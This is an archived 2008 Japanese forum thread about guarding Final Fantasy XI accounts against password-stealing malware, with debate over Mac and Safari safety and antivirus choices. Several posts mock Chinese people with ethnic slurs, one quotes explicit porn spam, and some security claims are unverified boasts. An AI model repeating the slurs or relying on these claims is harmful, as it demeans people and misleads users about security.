594 :既にその名前は使われています:2008/03/20(木) 06:32:55.80 ID:1K9QRugO
>>583
俺の大学の教授がmacオタで研究室にmacしかなくて泣く泣く使ってたんだけど、
そんとき入ってたブラウザがSafariだった。macの標準とかなのかな?
デザインはitunesと同じ感じ。先日試しに入れてみたんだけど表示が全部英語で俺涙目www
…と思ったらつい一昨日メニューも日本語版のやつが出たんだな…ちょっと入れてくる
文字がmacチックで(アンチエイリアス処理が激しい)windowsユーザーは最初慣れないかも
設定ではポップアップブロック,plugin,java,javascript,cookieのオンオフができる
見たところIframeのオンオフはなかった


595 :既にその名前は使われています:2008/03/20(木) 08:06:48.52 ID:fFVD+6yv
Safar3.1はAcid3テストでFirefox4alphaを上回るスコアを出している。
…なんてことはどうでもよくて、割と平然と罠を踏めるブラウザとして使ってるw
(IEとかは普段用にいろいろてんこ盛りにしてるので)。

596 :既にその名前は使われています:2008/03/20(木) 10:10:02.31 ID:MrQLGMCI
>>594
SafariはApple純正のMac標準ブラウザ。
Windows版も出てきたね。
WinでいうところのIEってところだね。
俺も英語版のをWin版Safariを試しに使ってみてたけど
日本語表示はできてたけど、日本語入力ができなかったんで
あきらめてたところ。
日本語版も出たならさっそく入れてみるわw
情報ありw

>>573
そかな。
死にたくない人はチベットやイラクにはいかないのと同じで、
感染したくない人はWindowsを使わない、
こういう考え方ってセキュリティの最も基本的な考え方だと思ってたけど。
それともなにか?
おまえはイラクにだって防弾キョッキ着て旅行すれば問題ない、と思う人か?w

597 :既にその名前は使われています:2008/03/20(木) 10:17:00.36 ID:MrQLGMCI
>>553
>みんながみんなMacやFF専用PCもってりゃいいけど、そうでもないでしょ。

Mac1台あればFF専用PC買う必要ないけどね。
最近のMacはWindowsもnative起動するから。
ちなみにおれはMacBook Proを1台だけ持ってて、
普段はMacで起動して仕事。
FFするときだけWindowsで起動して遊んでるよ。

598 :既にその名前は使われています:2008/03/20(木) 10:26:31.37 ID:wn95jAj+
うちもIntel MacでWindowsとOSXを切り替えてつかってる。
他にパラレルズ使ってXP起動させてFFやろうとも考えたけど
ポリゴン表示がえらいことになるから使えんw
バグなのかうちだけの問題なのかよくわからんのだけども

599 :既にその名前は使われています:2008/03/20(木) 10:27:33.34 ID:dhA8mwh3
こいつが>>546が言ってる皮先かw

600 :既にその名前は使われています:2008/03/20(木) 10:32:51.65 ID:MrQLGMCI
>>589
ちょっと話が脱線気味なんでこれでこの話題は最後に駿河、
ParallelsでFFはさすがに無理だよw
俺もParallelsいれているけどFFは無理だった。
素直に再起動してWinでnative起動した状態でFFやれ。
>>599
そうそう、よくわかったねw おりこうちゃんw

601 :既にその名前は使われています:2008/03/20(木) 10:32:53.69 ID:wn95jAj+
所でSafariの新しいバージョンはFirefoxと比較して安全なのかな?
使ってみたけど、いまいちよくわからんw

602 :既にその名前は使われています:2008/03/20(木) 10:34:10.86 ID:MrQLGMCI
>>601
どれ、なら今からちょろっとWin版Safariで地雷踏んでみるわw
報告は本日夕方以降になるかも。

603 :既にその名前は使われています:2008/03/20(木) 10:34:45.19 ID:wn95jAj+
>>600
やっぱパラレルズは駄目かーw
チャットくらいなら出来るんだけど、キャラがねぇ・・
ありがdw

604 :既にその名前は使われています:2008/03/20(木) 10:36:05.85 ID:3D4GO1VT
>>597
Winのゲームやるのに、Mac買うやつなんて希少種だから
対策案としては下策だな

605 :既にその名前は使われています:2008/03/20(木) 13:18:18.72 ID:wn95jAj+
∠(@O@) ビシッ!

606 :既にその名前は使われています:2008/03/20(木) 13:43:52.74 ID:+Ux7YVKL
今はチベット支援団体にウイルスメールが大量に送りつけられてるそうだ。
さすが中国と言わざるを得ない

ところでsafariも普及すれば必ず脆弱性を見つけて狙われると思う。

607 :既にその名前は使われています:2008/03/20(木) 13:53:15.50 ID:h12bDMTI
>>606
中華らしいな…
あいつら数に物言わせての団体行動は得意だからな。
今の中国って、世界一の洗脳教団だよなー

608 :既にその名前は使われています:2008/03/20(木) 13:54:42.42 ID:dUG+KiwF
そして指摘されると「証拠もなしにいい加減なことを言うなアル。これは日帝・アメリカの陰謀アル」

609 :既にその名前は使われています:2008/03/20(木) 13:54:43.32 ID:xQHWspxW
4000年の文化、歴史があるとか誇ってるくせに
他国の文化はまったく無視でパクルしな

610 :既にその名前は使われています:2008/03/20(木) 13:55:28.12 ID:dUG+KiwF
4000年前の歴史しかすがる物が無いしな。

611 :既にその名前は使われています:2008/03/20(木) 13:59:13.19 ID:qwMPlUsj
俺小さい頃 中国3000年の歴史って言ってた気がするんだよなぁw
10年で1000年増えるとはすごい国ですね^^

612 :既にその名前は使われています:2008/03/20(木) 14:17:27.20 ID:XtaX82rM
数がいつの間にか倍増するのが支那クオリティw

613 :既にその名前は使われています:2008/03/20(木) 14:40:45.43 ID:D4ylaxkd
FFAHのフォーラムより抜粋

By 無名 2008-03-19 02:16:48

今はないようですが、19日17時頃、トップページのサーバーランキングのところに危険URL?へ
アクセスするインラインフレームが埋め込まれていました。
wowinterfcae.comというサイトですが、詳しい方いましたら教えてください。

By Lakshmi.Jaerik 2008-03-19 14:47:28

一昨日、1時間ぐらいの間に、アドネットワーク(Tribal Fusion)からのトップフレームの広告に
危なさそうな1pxインラインフレームがあったようです。
ユーザから報告来たところで、我々管理人がアドをブロックしました。

---
広告にirframe埋め込めるのか。
広告も本格的にヤバくなってきたのかもしれんなー

614 :既にその名前は使われています:2008/03/20(木) 14:40:59.52 ID:g5yaSyJ0
>>611
3千年だったなw

615 :既にその名前は使われています:2008/03/20(木) 14:42:11.95 ID:7fSfV05v
ちょうど四捨五入にあたったんじゃね?

616 :既にその名前は使われています:2008/03/20(木) 14:46:14.71 ID:oOuEsog5
否、3001年になったとこで切り上げだろ

617 :既にその名前は使われています:2008/03/20(木) 16:32:29.92 ID:IlhcSNTO
>>613
広告にトロイ載せる?マジで?無料スペース全部駄目になるじゃんw
ッて言うか企業ページの広告もやばいのか?www

618 :既にその名前は使われています:2008/03/20(木) 17:23:15.68 ID:h12bDMTI
>>613
あーなるほど。f2cもそれかもなー、とは思ってたんだわ。
いや、ウイルスが発生したタイミングって、実はf2cのブログの仕組みが代わって直ぐのタイミングだったんだわ。
ただ、f2c内で広告が出るタイミングは、ブログ更新サボってから一月で…ってスクリプトだから、そこもいじられてる可能性あるけどな…

619 :既にその名前は使われています:2008/03/20(木) 17:40:54.70 ID:yYznPb3e
>>617
613のはやられた感じがしないでもない。
運営管理者が意図しないものみたいだしな。

中華が金を払ってヤフーにオーバーチュア広告に広告申請をして罠を仕込んだ事例はある。
リネ資料室の感染源サイトページにも事例出てるしな。
約3年ほど前の事例だが
http://lineage.nyx.bne.jp/misc/security/id_virus-site.html#JPLOVE888
http://lineage.nyx.bne.jp/misc/security/id_virus-site.html#INFO

613のやつのWHOIS、福建は福建だが、湖南省アモイ市とかでたらめに書いてるみたいだね。
Domain name: wowinterfcae■com
Fujian province,Xiamen City (福建、アモイ)
Xiamen Hunan 100084 (アモイ、湖南)
Created: 2007-11-24

620 :既にその名前は使われています:2008/03/20(木) 18:11:23.98 ID:+rg0XH3o
>>606
>ところでsafariも普及すれば必ず脆弱性を見つけて狙われると思う。

この議論はもう聞き飽きたよ。そんな当たり前のことを繰り返すな。
日本も攻撃を受ければ、イラクよりひどい目にあるだろうね。
だけど、現状、日本は攻撃されてないので安心して暮らせる。
要するに、「今安全なところ」に住めばいいだけの話だろ。
池沼かよw

621 :既にその名前は使われています:2008/03/20(木) 18:44:03.10 ID:IlhcSNTO
>>620
防備を怠るな、ッて話じゃないの?

>>619
あ〜有るね、スポンサーサイト枠。
前FF11狙いで「花のしずく」ってのもあったと思う。

622 :既にその名前は使われています:2008/03/20(木) 19:13:46.01 ID:qwMPlUsj
花の雫とか懐かしいなーw

623 :既にその名前は使われています:2008/03/20(木) 19:32:23.26 ID:0ozGWzos
age

624 :既にその名前は使われています:2008/03/20(木) 21:21:20.73 ID:Smk0S4TY
>>620
「今安全なところ」に住むだけじゃ足りない。

625 :既にその名前は使われています:2008/03/20(木) 21:33:13.56 ID:oOuEsog5
竜スレより
407 名前:おすすめ2ちゃんねる[] 投稿日:2008/03/20(木) 21:21:56.03 ID:gyNVpam+
2008年2月のMVP 『わるきゅ〜れ』吸尻鬼 〜アナル姫肛姦調教録〜

◆ひたすらにアナルを犯し、尻穴を責め続ける肛姦アドベンチャー!
 エロ発信基地「わるきゅ〜れ」がお送りする卑猥なケツ穴物語!
 それはプレイヤーのアナル属性の有無に関わらず射精必至!
 エロく無ければエロゲーじゃない!
◆調教時には『調教モード』に突入し、行いたいアナルプレイを選択!
 それまでの行動によって出現調教変化!
 全てのアナルプレイを見るまでには貴殿の肉棒は淫狂い!

ダウンロード:URL省略最後が.rar


俺のコーヒーミルク返せw

626 :既にその名前は使われています:2008/03/20(木) 21:43:44.41 ID:fFVD+6yv
エロ狙いも前からあるねぇ。
ネトゲプレーヤとあまり層がかぶらない気もするけど
エロは判断能力を低下させる(振り込め詐欺とか)。
下手な鉄砲数撃ちゃ…だ。

ところでFC2ブログをハックしまくったhellh■net(dda3■netと同一犯)が
新型をばら撒いている模様。注意されたし。
Kaspersky・Dr.WEBが撃墜、AntiVirもすぐ対応すると返答あり。

627 :既にその名前は使われています:2008/03/20(木) 21:47:03.89 ID:RpUvx5fd
>>624
まぁしかし安全なところに住むってのは
確かにセキュリティうんぬん以前の基本ではあるなw
おれもMac検討してみるか。
最近のMacはWinも起動できるとは知らんやったわw
進化したもんだな。

628 :既にその名前は使われています:2008/03/20(木) 22:30:02.13 ID:h12bDMTI
>>627
そしてウイルスにあって涙目になる訳か…

そもそも、被害報告がない=ウイルスに会わない。
って形はそうそうならない。
単に人口が少なくて、被害が外に繋がりにくいって事もあるからな。
ほら、人口を減らしまくって情報が伝わりにくい国が隣にあるじゃまいか…

後、MACでFF出来たっけ?
俺そんな話し聞いた事ないんだが…ちとググってみるか。

629 :既にその名前は使われています:2008/03/20(木) 22:38:36.48 ID:lf5ar/Sq
垢ハック恐れてMacなんか使っても無駄だ。
Windowsで起動してる間はMacOSとか関係なくて
Apple制のPCでWindowsが起動している感じ。
大体みんなFF窓モードとかにして遊んでる間にブラウザ起動して遊びながらウェブみたりしてるわけだろ。
その時にウィルス踏んだら普通に感染するぜ、つまり今までと同様の対策は必要。
MacOSでのネットサーフィンからだと確かにWindows向けのウィルスには掛からない、そう言う意味では安全だ。
だけれど、ネット見ようと思うと再起動が必要だ、遊んでる時に再起動なんて出来ない。
それと普段のネット見るためにMacOSからってんならそれはそれで良いが、実際切り替え結構めんどうだぞ。
Windowsで起動しっぱなしになれば益々Mac使ってる意味なんてなくなるぜ。
漏れは好きでMac使ってるけど、Macに興味も無い人間がOS使っても使い慣れなくて使いにくいだけだ。

630 :既にその名前は使われています:2008/03/20(木) 23:01:37.62 ID:lf5ar/Sq
>>628
Apple制PCにWindowsをインストールすることは出来るが(パーティションを切るか別HDDを用意する必要アリ)
MacOSを使ってFFを起動させる事は不可能。

ちなみに、MacOSはNTFSでフォーマットされた物を見る事は出来るが書き込む事が出来ないので
MacOS起動中はWindowsパーティションはほぼ100%安全。
でもFAT32でフォーマットされてるとMacOS側からも書き込み可能なので注意。
それとWindowsはMacOSのフォーマット方式に対応してないので、
Windows起動中はMacが入ってるパーティション/HDDは感知できず無いも同然の状態になってる。

前々から書いてるけど、Macとかよりもネットブラウジング専用の仮想環境を用意汁。

631 :既にその名前は使われています:2008/03/20(木) 23:04:04.15 ID:3J0OuW6b
このスレ「mac」という文字列をNGワードにすると
レスが半分消えるから不思議だ。

632 :既にその名前は使われています:2008/03/20(木) 23:38:09.06 ID:Dbks/4Bn
価格.comのAbeeの電源の口コミに、Abeeのカスタマーセンターの人が書き込みしてたのと同じだな。
Macの社員がMacを勧めてるだけみたいなw

↓以前リネ2のパス抜き?だったかでハックされた事もあるサイトなので、見たい人は自己判断で。
bbs.kakaku.com/bbs/05900310887/#7411423


633 :既にその名前は使われています:2008/03/20(木) 23:44:45.92 ID:dUG+KiwF
>>630
CDブートのLINUXとかあったきがするな。
それでいい?

634 :既にその名前は使われています:2008/03/20(木) 23:48:56.15 ID:zppKAgFE
>>633
それだと、>>630の言いたいことが、全然理解できてないかと(´・ω・`)

635 :既にその名前は使われています:2008/03/20(木) 23:51:11.67 ID:TJhJD7BS
おろ?
日付変わってないのに、IDかわっとる(´・ω・`)?

636 :既にその名前は使われています:2008/03/20(木) 23:57:18.07 ID:TJhJD7BS
保守ついでに、もっかいID確認
ちなみに、今日書き込んだのは、624,634,635。

637 :既にその名前は使われています:2008/03/21(金) 01:16:17.81 ID:qvKGW0z3
にゃあにゃあ
Safari使えば、IEだと感染するトロイや罠JavaScript,ActiveXみたいのを含んだサイトを踏んでしまっても平気ですか?
それともSafari使っても感染するときはする?
ちょっと誰かSafariで罠サイト踏んでみて報告してほしいニャ

638 :既にその名前は使われています:2008/03/21(金) 01:46:06.63 ID:Wpx8UETa
大丈夫だったよ。

639 :既にその名前は使われています:2008/03/21(金) 02:00:33.02 ID:pwHVDVfR
>>637
IE固有のセキュリティホールを突いてるやつなら、IE以外のブラウザを使えばおk
それ以外なら、どのブラウザ使っても一緒。
基本的にSafariだろうがFirefoxだろうが危険度ではIEと変わらんと思ってるので、
使い慣れたスレイプニル(IEとエンジン一緒w)をIEエンジンorGekkoエンジン切り替えで使ってる。
ま、WEBブラウズ自体をそれ専用PCにはしてるがね。
それでも100%安全とはいえないが、やらないよりはマシって程度。
100%安全っていえるのは、PC使わないってことじゃねw

感染しても大丈夫な専用PC(感染してもクリーンインスコで無問題)用意するか、
それが無理なら630がしつこく言ってる仮想環境用意するのが良いと思う。

Mac&Safariなら安全とか思うのは、間違いよ。





640 :既にその名前は使われています:2008/03/21(金) 02:39:36.93 ID:7lxfS9dH
>>633
俺はまさにそのKnoppix使っている。フリーのCDイメージを落として焼くだけ。
メジャーなチップを使っているならほぼ認識してくれる。
操作系もほぼWinに似せてあるしな。FF退役PCなら余裕で動く。

unit.aist.go.jp/itri/knoppix/

641 :既にその名前は使われています:2008/03/21(金) 02:48:53.45 ID:IEw5PmDY
CDからブートできるLinux系OSならセリオってのもあったなそういや

にしてもマカーがここまでウザいとはw



642 :既にその名前は使われています:2008/03/21(金) 04:33:50.31 ID:mSf8OHwM
まかーの印象が悪くなるから止めて欲しいんだが。まじで。
どうせ漢字トークもしらないにかわだろうが。

643 :既にその名前は使われています:2008/03/21(金) 04:33:57.40 ID:IhsAYsf1
バウー

644 :既にその名前は使われています:2008/03/21(金) 04:34:46.37 ID:IhsAYsf1
>>642
おい、保守しようと思った俺が馬鹿みたいじゃないか

645 :既にその名前は使われています:2008/03/21(金) 07:02:43.38 ID:qvKGW0z3
Linuxで2chブラウザ動くのだろうか
Janeが無いとかなり困るのだが・・・

646 :既にその名前は使われています:2008/03/21(金) 07:49:53.97 ID:cmlEh2ds
>>645に入ってるキーワード2つでググるとあっさり答えが見つかることを何故
わざわざここで聞くんだ?

647 :既にその名前は使われています:2008/03/21(金) 08:17:13.54 ID:IHmXpTvm
ホシュするお!

648 :既にその名前は使われています:2008/03/21(金) 08:37:58.28 ID:R0toWM91
PG2導入しようと思ったがリストの追加がわからんかった・・・

649 :既にその名前は使われています:2008/03/21(金) 08:43:21.39 ID:qbd4kBrz
とりあえず
・パスワード手動化
・avast
・spybot
を導入

FWは昔からKerio使ってる
こんなもんかなぁ

650 :既にその名前は使われています:2008/03/21(金) 09:01:17.31 ID:YMsAeZ16
>>648
リネージュ資料室でググる
FFXI中心でこんなところも
ttp://miku.a.orn.jp/miku6/faq.html

ふむのが怖ければ「pg2 ffxi」でググればトップにでる

651 :既にその名前は使われています:2008/03/21(金) 09:58:59.10 ID:R0toWM91
>>650
理解した。
導入完了したしノートン先生の完全スキャンもしたしPOLパスも変えた。
いや、怪しいURL踏んだとかしてないけど一応やっといて損はないでしょうしね〜。
あとはブラウザか・・・IE7に慣れてしまったせいかどのブラウザ使っても違和感が。・゚・(ノД`)・゚・。

652 :既にその名前は使われています:2008/03/21(金) 10:19:07.54 ID:qBPgZsZN
>>651
IE7なら良いよ
設定しだいだけどさ
どのブラウザだろうが意識の問題だ

653 :既にその名前は使われています:2008/03/21(金) 10:28:39.61 ID:1xWKYoqc
PG2入れるとwin終了遅くなんない?



654 :既にその名前は使われています:2008/03/21(金) 11:02:09.23 ID:YMsAeZ16
>>653
常駐させてれば、当然終了時にプログラム終了の手間があるから遅くなるわな

ただ、その数秒終わるのが遅くなるのと、安全と、どちらをとるか、と言うこと

655 :既にその名前は使われています:2008/03/21(金) 11:04:26.81 ID:IM7Hih85
PG2てのは他のファイアウォールと共存させても大丈夫?
ぐぐってもどうもよく分からん

656 :既にその名前は使われています:2008/03/21(金) 11:23:20.03 ID:YMsAeZ16
>>655
共存は出来そうだが、日本語版の説明だとマカフィーとBlackICEってとこのとは
相性が悪いらしい


657 :既にその名前は使われています:2008/03/21(金) 12:30:13.27 ID:PmBerChw
保守

658 :602:2008/03/21(金) 12:57:49.93 ID:yR7Am9/m
Win版Safariでこのスレに貼ってある危険なURLを
ふんでみました。
もちろんF-secureで完全防備した上で。

結果は、ウイルスてかワームかな?が
ちゃんとF-secureで捕獲されまくりますた!w
例えば、JS/Agent.CGとかいうやつだったかな。
ま、よ〜するに、Win版のSafariもやっぱダメってことでw

ちなみに当然のことながらMac版のSafariなら
このスレの危険URLを踏みまくっても全然平気w
おもろいから踏みまくってやったわ。

659 :既にその名前は使われています:2008/03/21(金) 13:11:37.04 ID:BlGE/mNF
おまえの前世はアメリカの安っぽいドラマとかで余計なことをして最初に死ぬヤツに違いない

660 :既にその名前は使われています:2008/03/21(金) 13:16:17.28 ID:YMsAeZ16
とりあえず誰か>>602を要塞の焼却炉に捨ててきてほしい

こんなんじゃ、まともなMac使いがかわいそうだ

661 :既にその名前は使われています:2008/03/21(金) 13:22:42.03 ID:JX2kFnn1
JS/AgentCGってのはindex.htmファイルなんだから
どんなブラウザだろうと読み込もうとするし
ウイルス対策ソフトいれてればMacでも検知するって^^;

Win向けだろうがMac向けウイルスだろうが検知するのが
真っ当なウイルス対策ソフトだ


662 :既にその名前は使われています:2008/03/21(金) 13:27:57.44 ID:yR7Am9/m
>>660
洋裁の焼却炉・・・・。行きたいんだけど、
なかなか行けないよね。
>>649
good job!
パスワード手動化したのはセキュリティ面で大きいだろうね。

663 :既にその名前は使われています:2008/03/21(金) 13:32:32.04 ID:JX2kFnn1
>>662
DAT落ちしたが リコポディウムを植えるスレ の8を嫁ばシアワセになれるんだぜ
googleキャッシュ
ttp://209.85.175.104/search?q=cache:8ZzBEF1maBcJ:live27.2ch.net/test/read.cgi/ogame/1205772617/-100+%E3%83%AA%E3%82%B3%E3%83%9D%E6%A4%8D%E3%81%88%E3%82%8B%E3%82%B9%E3%83%AC&hl=ja&ct=clnk&cd=1&lr=lang_ja

664 :602:2008/03/21(金) 13:37:36.19 ID:yR7Am9/m
>>661
そうなんだw
けどMacの中にWin専用マルウェアが入り込んだとしても
ただのデータファイルでしかないわけだから、
それはマルウェアとは言えないのじゃないのかな。
こんな俺でも1年くらい前まではMacでもちゃんと
ウイルス対策してたよ。Virexっていうやつで
週1回くらいはスキャンしてた。
だけど見つかるのはWindows専用ウイルスばっかだし
あんかアフォらしくなってもうやめた、という経緯がある。

665 :既にその名前は使われています:2008/03/21(金) 13:40:57.37 ID:yR7Am9/m
>>663
ほぉ! こりゃ便利だねw
ついこないだフレに要塞で白AFのカギとりを
手伝ってもらって3日がかりでやっとゲトしたんだけど、
箱もアルタナ入れたらとりやすいよ、とのことで
早速おとといボチっとしたんだけど、
焼却炉クエにも使えそうな悪寒がするよw

666 :既にその名前は使われています:2008/03/21(金) 13:43:31.93 ID:HsHAqqq0
家の中でルーターに2台のパソコンを繋いでいて
一台はFF専用、もう一台はFF以外用の場合
FF以外用のやつが感染したらLANケーブル伝ってウイルス移ってくるものなのかな?

667 :既にその名前は使われています:2008/03/21(金) 13:48:05.45 ID:yR7Am9/m
>>666
ルータ内同士のパソコン間では当然感染する。
ただし「FF以外用」のパソコンがLinuxなどなら
FF専用Winマシンには感染しない。OSが違うから。

668 :既にその名前は使われています:2008/03/21(金) 14:00:16.84 ID:HsHAqqq0
>>667 トンクス
今度PCを新調するからそれをFF用にして、
今使用中のPCをOS再インストしてからネット等に使おうと思ってたんだが
ウイルス対策にはならんか〜・・。両方ともxpだし。

669 :既にその名前は使われています:2008/03/21(金) 14:00:36.44 ID:A8aOrR6N
うちルーター経由で4台繋いでる(家族1人1台PC持ってるから)
全部にウィルス対策ソフト入れて、
FFやってるPCではネットしてない、PG2とスパイボット入れてあるけど

全部winだからルーター経由ってのヤツに感染したらダメぽ・・・・orz


670 :既にその名前は使われています:2008/03/21(金) 14:03:32.69 ID:A8aOrR6N
>だけど見つかるのはWindows専用ウイルスばっかだし

mac用のウィルス作るコトって、
ベータビデオユーザー向けソフト作るぐらい
一般的じゃないからね

671 :既にその名前は使われています:2008/03/21(金) 14:03:51.96 ID:yR7Am9/m
MacOSXでもウイルス対策は必要ということは
よくわかりました。
俺はMacBook ProでFFをやってるので
WindowsパーティションにはF-secureを入れています。
だけど、Macパーティションには入れてませんでした。
そこで、いろいろとMac用のセキュリティソフトを
探してみましたが、悪徒2とかノートンとかマカフィーとか
あんまりいい噂を聞かないところのソフトしかないようで
がく然としました。
けど、これはなかなか良さそうです。
さっそくインスコしてみました。
ClamXav
ttp://www.clamxav.com/index.php?page=dl
また後日談をお話ししますね。

672 :既にその名前は使われています:2008/03/21(金) 14:07:14.10 ID:yR7Am9/m
>>668
まぁしかしネットワーク上から直接入り込むタイプのワームは
(要するにサーバを攻撃するタイプね)
一度ルータ越えをしないと感染しないんで、
ルータがしっかりしたものを使っていれば
あんまりきにしなくてもいいかもしれんけどね。
ルータがバッキャローとかコレガとかはダメよw

673 :既にその名前は使われています:2008/03/21(金) 14:09:24.05 ID:JX2kFnn1
Clamアンチウイルスは興味深い試みだが・・・
利用者はがんばって検体提出をして欲しいぜ。

674 :既にその名前は使われています:2008/03/21(金) 15:16:23.45 ID:yt0VNls8
>>671
ClamAVは群雄割拠のWindowsのアンチウイルスから見た場合は
正直言ってウンコなんだが、それでもMac専用で最も売れている(※)
VirusBarrierよりマシらしい。
ま、Macの市場規模相応に、ロクなウイルスは無いが
ロクなアンチウイルスもまた無いということだろう。

※BCNランキングより俺調べ。専用ではない場合はNortonがとりあえず首位。
ttp://bcnranking.jp/category/subcategory_0019.html

675 :既にその名前は使われています:2008/03/21(金) 15:26:30.80 ID:yt0VNls8
>>673
ClamAVは原則お1人様1日2ファイルまで(※)というステキなベンダーだ。
ボランティアみたいなオープンソースなので単純にマンパワー不足なんだろうけど
日本向けだけでも1日2桁投下されるネトゲ中華トロイに対応できないのは明白。

※ ttp://cgi.clamav.net/sendvirus.cgi
>please do not submit more than two files per day.

676 :既にその名前は使われています:2008/03/21(金) 15:35:15.73 ID:PmBerChw
垢ハックトロイではないけれど

F1マレーシアグランプリの公式サイトが乗っ取られる、F-Secure報告
ttp://internet.watch.impress.co.jp/cda/news/2008/03/21/18894.html

マレーシアグランプリのサイト(www.malaysiangp.com.my)にアクセスしようとしたところ、
「Hijack by CuciOtak」という文字と洗剤のパッケージのような画像が表示されることを発見。
調査したところ、DNS情報が書き換えられたことによって別のサーバーに誘導されており、
公式サイトのIPアドレスでアクセスした場合には正常な内容が表示されたという。

677 :既にその名前は使われています:2008/03/21(金) 15:39:13.87 ID:miUzx6dO
どっかのDNSサーバがクラックされたってこと?
それが出来るってヤバくね?

678 :既にその名前は使われています:2008/03/21(金) 15:41:13.83 ID:cmlEh2ds
>>677
この手は昔からあるな

679 :628:2008/03/21(金) 15:42:43.84 ID:+u+X8c/Z
>>630
にゃるほど。
その仕様なら、MacにFFはお勧め出来ないか…
それじゃ、Macを禁止ワードに入れるかー
正直うざくなってきた。

680 :既にその名前は使われています:2008/03/21(金) 16:52:05.37 ID:HsHAqqq0
セキュリティ板みてるとカスぺってネトゲとかの通信速度が大事なことには不向きなのかな?

このスレ見てカスぺ買おうかと思ってあっちの板もみてたんだが。
新PC用にバスター買って来てあるんだが、この前の不祥事だし・・。

681 :既にその名前は使われています:2008/03/21(金) 16:54:19.19 ID:e1/zBgkd
裏で釣り役とかリンバスで赤とかソロで竜とかやってるが、
カスペ使ってて致命的な遅れが出たってことはないなー

それこそFPSのスナイポでもないかぎり大丈夫じゃね?

682 :既にその名前は使われています:2008/03/21(金) 16:55:51.23 ID:LbI9Zv4m
>>680
カスペの設定で早くできる
有名な事柄だからぐぐりゃどうすればいいかでてくるはず

@体験版あるから迷うなら使ってみて決めればいい

683 :既にその名前は使われています:2008/03/21(金) 17:00:01.54 ID:cnnEuYmq
上げてくぞー

684 :既にその名前は使われています:2008/03/21(金) 17:17:42.39 ID:yt0VNls8
>>680
軽く見せるためにデフォルト設定スッカスカの製品とは違って
カスペはデフォでガチガチなんすよ
(んでFWのリークテストではアンチウイルス付属FWとしてはトップ)。
いらんもん外していく感じ。

685 :既にその名前は使われています:2008/03/21(金) 17:45:10.18 ID:yt0VNls8
げんなりするような新型
ttp://www.virustotal.com/analisis/ac9b75b1bfca82b29a5801da2ff0aa36
捕獲はDr.WEBとMicrosoft(笑)

686 :既にその名前は使われています:2008/03/21(金) 17:46:01.02 ID:JX2kFnn1
MSなめんなよ^^;

687 :既にその名前は使われています:2008/03/21(金) 18:32:01.88 ID:Szk/ZRWB
トレンドマイクロのWeb改竄、ウイルス感染の恐れは6ページのみ
http://internet.watch.impress.co.jp/cda/news/2008/03/21/18898.html

688 :既にその名前は使われています:2008/03/21(金) 19:03:26.42 ID:OZ8DztAT
>>671です。
C l a m X a vでローカルを検索かけると、
こんなに見つかりましたw
Exploit.HTML.Bagle.Gen-4-eml
Exploit.IFrame.Gen
Worm.Bagle.H-zippwd-1
Exploit.HTML.Bagle.Gen-4-eml
Email.Phishing.DblDom-39
Trojan.VB-154
こいつらが合わせて19個みつかったw
最後の以外は全部メールの中。
最後のトロイの木馬はなぜか.exeファイルの中に。
M a cではやっぱウイルス対策ソフトは必要ないってことが
わかってよかったよw
いちいちWin専用ウイルスをスキャン〜駆除する時間がもったいなさすぎる。

689 :既にその名前は使われています:2008/03/21(金) 19:10:54.02 ID:JX2kFnn1
SPAMメールに仕組まれたExploit.Iframeって
固有IDを振ったURLを読み込ませてメアドの生存確認してるんじゃね
Win/Mac無関係のような希ガス


690 :既にその名前は使われています:2008/03/21(金) 19:12:20.03 ID:cnnEuYmq
226 名前:既にその名前は使われています[] 投稿日:2008/03/21(金) 18:53:18.36 ID:yR7Am9/m
>>225
あと、プライオンラインパスワードを保存しておいて
自動ログインするのではなく、
自動保存設定を解除した上でパスワードを変更し、
次回以降、毎回手入力でパスワード入力してログインすべき。
バーチャルキーボードなどのツールをつかって
マウスクリックでパスワードを入力すればさらに完璧。

なぜなら、現在多発している垢ハックの99%以上が
パソコン内のパスワード保存ファイルを盗んでいくタイプだから。

228 名前:既にその名前は使われています[] 投稿日:2008/03/21(金) 18:59:16.50 ID:yR7Am9/m
>>227
ちと待て。
今まで出てきた垢ハックツールというか垢ハック用マルウェアで
キーロガータイプがあったか?
あったら参考までに教えてくれ。対策撮りたいので。

初心者スレで不確定情報を広めるの止めてくださいMac君

691 :既にその名前は使われています:2008/03/21(金) 19:14:45.34 ID:BlGE/mNF
マック君はハッキング知識が全く無く、「MACは安全^^」というCMのみを信じてすがるしかないヤツだからな・・・
ヌルーしてやれ。

692 :既にその名前は使われています:2008/03/21(金) 19:19:54.03 ID:Q7NqsPR9
>>690
そのレスに限って言えば特に何か変な事を言ってるわけでは無いと思うのだが…

693 :既にその名前は使われています:2008/03/21(金) 19:26:54.75 ID:AfMGNSpw
>>681,682,684
レストンクス! カカッと7.0買ってきたは
あぐる!

694 :既にその名前は使われています:2008/03/21(金) 19:29:45.16 ID:1/j9EAZq
>>692
垢ハックの99%以上がパスワード設定ファイルを盗まれての被害だってのは
業者以外に分かるもんなのか?

695 :既にその名前は使われています:2008/03/21(金) 19:32:44.91 ID:7lxfS9dH
>>693
カスペルおめ。

このアプリの接続をヌルーすると言う設定に気付かず、
ウィンドゥモードにしてエリアチェンジするたびに
「POLが不明な接続先に接続しようとしています。接続しますか?」
というダイアログをいちいちクリックしていた・・・・・orz

696 :既にその名前は使われています:2008/03/21(金) 19:54:48.25 ID:OZ8DztAT
>>689
なるほど勉強になりますスレですね。ここは^^
>>694
そらわからんけど99%っていう数字は当たらずとも遠からず
だと思うけどね。
前の方で書き込みあってたけど
キーロガーで不特定多数からパスワードを盗むってのは
至難の業だし、
パスワード設定ファイルをそのまま盗んでいった方が
100倍以上効率がいいはず。
業者がMacを狙わず、Winを狙うのは効率を考えているからで、
その線から考えても妥当な考えかと。

697 :既にその名前は使われています:2008/03/21(金) 20:05:29.64 ID:cmlEh2ds
>>696
>業者がMacを狙わず、Winを狙うのは効率を考えているからで、
>その線から考えても妥当な考えかと。

MacにFFのパスワード設定ファイル保存してる奴が世界に何人いるんだ?
MacからFFのパスワード設定ファイル抜くトロイ作ることがほぼ無駄ってことは
業者じゃなくてもわかるよな?

698 :既にその名前は使われています:2008/03/21(金) 20:17:52.03 ID:IEw5PmDY
GMサポート中断に関するお知らせ(3/21)

下記日時におきまして、ゲームマスター(GM)チーム全体会議を行うため、GMサポートを中断いたします。
この時間中は、GMコールをお送りいただきましても、GMがお話を伺うことができません。GMによるサポートが必要な場合には、会議が終了します22:00以降に改めてGMコールをお送りください。

お客様にはご迷惑をおかけいたしますが、ご了承いただけますようお願いいたします。

             記

日 時:2008年3月21日(金) 20:00より22:00まで

対 象:日本国内版で以下のGMサポートをご利用のお客様
    ・プレイオンラインGMコール
